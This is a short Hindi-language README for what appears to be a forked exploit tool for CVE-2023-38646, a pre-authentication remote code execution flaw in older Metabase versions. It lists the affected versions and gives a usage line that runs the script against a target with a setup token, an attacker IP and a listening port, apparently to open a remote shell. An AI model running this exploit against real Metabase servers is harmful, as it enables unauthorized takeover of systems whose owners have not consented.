
Metabase में CVE-2023-38646 Pre-Auth RCE
kh4sh3i's का फोर्क, जिसमें Burp Collector की आवश्यकता को हटा दिया गया है।
CVE-2023-38646 (Metabase में Pre-Auth RCE):
0.46.6.1 से पहले का Metabase open source और 1.46.6.1 से पहले का Metabase Enterprise हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर, मनमाने कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है।
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
अधिक जानकारी के लिए यह पोस्ट पढ़ें।